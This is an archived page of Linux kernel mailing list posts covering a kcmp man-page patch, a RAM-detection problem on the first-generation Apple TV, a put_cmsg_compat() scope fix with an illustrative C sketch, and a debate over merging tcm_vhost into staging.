To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH 0/2] kcmp.2 manpage and prctl.2 update

2012-07-22 Thread Cyrill Gorcunov
Hi Michael,

here are two patches on top of current man-pages git.
Please review. If there is something I should rephrase
or anything else -- please don't hesitate to poke me.



Re: Kernel not detecting all of physical RAM in 1st generation Apple TV

2012-07-22 Thread Damián Gatabria
I've hit the same problem; 3.4.4 still only uses 64MB of memory, even
though it detects all 256MB of it. Could anybody please at least
review the kernel config provided by Bharath and let us know if
there's anything obviously wrong with it or if this is expected
behavior for some reason?


Thank you.



On Mon, Jun 25, 2012 at 10:52 PM, Bharath Ramesh  wrote:
>
> I am trying to get a minimal kernel config running on a 1st generation
> Apple TV to compile the kernel so that I can have it detect all of the
> 256MB of RAM the device has. A brief summary to get Linux booting on
> the 1st generation Apple TV requires the use of the atv-bootloader
> project [1]. The 1st generation Apple TV uses EFI and the
> atv-bootloader project translates EFI structures to standard PC BIOS
> structures. The issue I am facing is that the kernel doesn't always detect
> the entire 256MB of RAM that the Apple TV has. With a very minimal
> change in the kernel config I can cause the kernel not to detect the
> entire 256MB of RAM. I have test config along with the respective
> dmesg output which shows this issue. This was not the case with the
> earlier 2.6.24 kernel that I am running, the 2.6.24 kernel is a Ubuntu
> 8.04 distribution kernel. The following config and dmesg is using
> kernel.org source.
>
> config-3.2.18-nouveau-256M: http://pastebin.com/9V8dSED3
> config-3.2.18-nouveau-64M: http://pastebin.com/CsUK0yy3
> config.3.2.18-nouveau-256M-64M.diff: http://pastebin.com/MkYbQf5V
> dmesg.3.2.18-nouveau-256M: http://pastebin.com/UUYBzqm8
> dmesg.3.2.18-nouveau-64M: http://pastebin.com/FDntUsfd
> dmesg.3.2.18-nouveau-256M-64M.diff: http://pastebin.com/2myAa9Z0
>
> Any help in debugging this issue so that I can get the kernel to always
> detect all of the RAM would be greatly appreciated. I am not
> subscribed to the list, so I would greatly appreciate it if I am copied in
> the response.
>
> Thanks,
>
> Bharath
>
> [1] http://code.google.com/p/atv-bootloader/


Re: [PATCH] net: Fix references to out-of-scope variables in put_cmsg_compat()

2012-07-22 Thread David Miller
From: Jesper Juhl 
Date: Sun, 22 Jul 2012 23:37:20 +0200 (CEST)

> In net/compat.c::put_cmsg_compat() we may assign 'data' the address of
> either the 'ctv' or 'cts' local variables inside the 'if
> (!COMPAT_USE_64BIT_TIME)' branch.
> 
> Those variables go out of scope at the end of the 'if' statement, so
> when we use 'data' further down in 'copy_to_user(CMSG_COMPAT_DATA(cm),
> data, cmlen - sizeof(struct compat_cmsghdr))' there's no telling what
> it may be referring to - not good.
> 
> Fix the problem by simply giving 'ctv' and 'cts' function scope.
> 
> Signed-off-by: Jesper Juhl 

Applied and queued up for -stable, thanks.


Re: linux-next: manual merge of the staging tree with the target-merge tree

2012-07-22 Thread Nicholas A. Bellinger
On Sat, 2012-07-21 at 19:07 -0700, Greg KH wrote:
> On Fri, Jul 20, 2012 at 09:42:28PM +0300, Michael S. Tsirkin wrote:



> > It's very similar to how it was with nouveau: we are not sure
> > we can commit to the userspace ABI yet.
> 
> Then you are in trouble :)
> 

I agree with MST here that tcm_vhost needs a clear way to indicate that
ABI changes are likely to occur in the transition from staging ->
post-staging status.

> > Most importantly, it still seems not 100% clear whether this driver will
> > have major userspace using it. And if not, it would be very hard to
> > support a driver when recent userspace does not use it in the end.
> > 
> > At the moment arguments on upstream mailing list seem to be
> > a bit circular: there's no module in upstream kernel so
> > userspace does not want to accept the patches.
> > 
> > If we put enabling this driver in staging, then it works out in one of
> > two ways
> > - userspace starts using it then this effectively freezes the ABI and
> >   we move it out of staging next release
> > - no userspace uses it and we drop it completely or rework ABI
> > 
> > On the other hand, it is marginally better to not want code in staging
> > for two reasons:
> > - there are dependencies between this code and other code in
> >   drivers/vhost which are easier for me to handle if it's all
> >   in one place
> 
> If there are going to be lots of dependencies, then I don't want it in
> drivers/staging/ as it doesn't belong there, it belongs cleaned up and
> in the "real" place.
> 
> > - a bit easier to track history if we do not move code
> 
> git preserves this, don't worry about that at all.
> 
> So, if this code really does depend on core vhost changes that are going
> to be happening over time, I would not recommend it being in
> drivers/staging/ as you are right, you are going to have a hard time
> syncing with me.
> 

Linus has merged target-pending/for-next this afternoon, so now we
are just waiting on net-next to hit mainline with the vhost patches
already ACK'ed by MST.  Hopefully that makes it easier for you to
consider taking tcm_vhost upstream via staging.  ;)

Also, MST asked for an RFC-v5 for the initial merge commit with some
minor debug wrapper changes that will be going out next week.  This will
include a move into drivers/staging/tcm_vhost/ against a rebased
staging.git patch with the necessary -rc0 mainline dependencies.

Please let me know if you're OK with this, otherwise I'll just plan to
keep -v5 against target-pending/for-next-merge for now, and send a GIT
PULL after MST gets back from holiday on the 29th -> 30th.

> But don't think that by somehow marking the driver with CONFIG_STAGING
> that you get a free pass on the "we are going to break the userspace
> api", that's not ok.  Be careful about this.  Yes, it's tough, and it's
> a "chicken and egg" problem like you mention above, I know.
> 

After sleeping on this, I'm wondering if there is not something else we
could do at the QEMU level to require an explicit 'development=1' flag
in order to use vhost-scsi while tcm_vhost is still marked as staging
code..?

QEMU folks, would you be open to something like this..?

Thank you,

--nab



[PATCH] net: Fix references to out-of-scope variables in put_cmsg_compat()

2012-07-22 Thread Jesper Juhl
In net/compat.c::put_cmsg_compat() we may assign 'data' the address of
either the 'ctv' or 'cts' local variables inside the 'if
(!COMPAT_USE_64BIT_TIME)' branch.

Those variables go out of scope at the end of the 'if' statement, so
when we use 'data' further down in 'copy_to_user(CMSG_COMPAT_DATA(cm),
data, cmlen - sizeof(struct compat_cmsghdr))' there's no telling what
it may be referring to - not good.

Fix the problem by simply giving 'ctv' and 'cts' function scope.

Signed-off-by: Jesper Juhl 
---
 net/compat.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/compat.c b/net/compat.c
index 1b96281..74ed1d7 100644
--- a/net/compat.c
+++ b/net/compat.c
@@ -221,6 +221,8 @@ int put_cmsg_compat(struct msghdr *kmsg, int level, int type, int len, void *dat
 {
 	struct compat_cmsghdr __user *cm = (struct compat_cmsghdr __user *) kmsg->msg_control;
 	struct compat_cmsghdr cmhdr;
+	struct compat_timeval ctv;
+	struct compat_timespec cts[3];
 	int cmlen;
 
 	if (cm == NULL || kmsg->msg_controllen < sizeof(*cm)) {
@@ -229,8 +231,6 @@ int put_cmsg_compat(struct msghdr *kmsg, int level, int type, int len, void *dat
 	}
 
 	if (!COMPAT_USE_64BIT_TIME) {
-		struct compat_timeval ctv;
-		struct compat_timespec cts[3];
 		if (level == SOL_SOCKET && type == SCM_TIMESTAMP) {
 			struct timeval *tv = (struct timeval *)data;
 			ctv.tv_sec = tv->tv_sec;
-- 
1.7.11.2
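
The lifetime issue the patch above addresses can be shown outside the
kernel with a small stand-alone sketch.  The struct and function names
here (wide_time, narrow_time, emit_time) are invented for illustration and
are not the kernel's types; the point is only that the temporary is
declared at function scope, so the pointer taken inside the 'if' is still
valid when it is used afterwards.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-ins for the native and compat time structures. */
struct wide_time   { int64_t sec; int64_t usec; };
struct narrow_time { int32_t sec; int32_t usec; };

/*
 * Copies either the wide or the narrow representation of *in into out.
 * Returns the number of bytes written, or 0 if out is too small.
 */
size_t emit_time(const struct wide_time *in, int narrow,
                 void *out, size_t outlen)
{
    struct narrow_time nt;   /* function scope: outlives the 'if' below */
    const void *data = in;
    size_t len = sizeof(*in);

    assert(in != NULL && out != NULL);

    if (narrow) {
        /*
         * Declaring nt inside this block instead would leave 'data'
         * pointing at an object whose lifetime ends at the closing brace.
         */
        nt.sec = (int32_t)in->sec;
        nt.usec = (int32_t)in->usec;
        data = &nt;
        len = sizeof(nt);
    }

    if (len > outlen)
        return 0;
    memcpy(out, data, len);  /* nt is still alive here */
    return len;
}
```

With the declaration moved inside the 'if', a compiler is free to reuse
the stack slot before the memcpy(), which is the same hazard the commit
message describes for 'ctv' and 'cts'.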


-- 
Jesper Juhl       http://www.chaosbits.net/
Don't top-post http://www.catb.org/jargon/html/T/top-post.html
Plain text mails only, please.


